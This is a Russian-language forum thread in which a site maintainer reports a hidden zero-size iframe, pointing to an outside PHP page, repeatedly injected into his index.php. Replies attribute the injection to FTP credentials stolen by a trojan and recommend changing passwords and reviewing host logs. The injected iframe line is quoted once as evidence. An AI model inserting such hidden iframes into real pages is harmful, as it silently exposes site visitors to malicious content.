|
Взлом сайта, причины
Я здесь новичок, поэтому прошу сразу не пинать меня.
Где-то с месяц назад, на одном из сайтов, кот. я поддерживаю обнаружил в index.php строку Код:
<!--iframe width="0" height="0" src="http://eburgertry.info/st/sp/sp.php"></iframe-->Поняв что сайт был взломан, я из бекапа восстановил индексный файл. Проблема повторялась подря 3 дня. Не понимал, где дырка (индексу не передавались никакие параметры, был тока вывод данных из mySQL). Потом проблема исчезла, причем никаких изменений я в скрипт не вносил. Сегодня рыскал в инете и случайно наткнулся на сайт: http://www.sadkamney.ru/ где походу та же проблема. Подскажите плиз, знающие люди, где косяк. Каким образом вообще в index.php можно вставить тег. Дайте линки, где об этом почитать можно. Еще раз просьба сильно не пинать:) зы Да у меня лично register_global=off и разрешения на файлы(в том числе на index.php) стоит 644 |
При доступе к файлам конечно, ты поди сам уже протроянен, на одном из моих сайтов было так-же когда меня протроянили... :)
Да, и не забудь сменить пароли к сайту, FTP, cpanel, etc... |
Цитата:
зы да троянец я этот словил на лок. машину, он заменяет IE:) |
Цитата:
|
Цитата:
Если я правильно понял работу скрипта, мне достаточно, поставить атрибуты на все файлы(в том числе и индекс) 444, то есть read, и проблема решена? Или нет? Доступ на сайт только по ftp естественно по правам рута. Никаких скриптов с записью в индекс и в другие файлы нет. То есть права рута, насколько я понимаю, тока у юзера, который ходит по ftp. Поставив атрибуты на файлы 444 и поменяв пароль на фтп, проблема должна исчезнуть? |
Никто не вкурсе как от этого защититься?
|
Generic54, если имеют права рута, то хоть 0 ставь - не поможет...
|
поэтому пиши письмо хостёру..пущай смотрит логи..может чего там и увидит левого.
|
Цитата:
|
Ифрейм трафик...
|
| Время: 11:14 |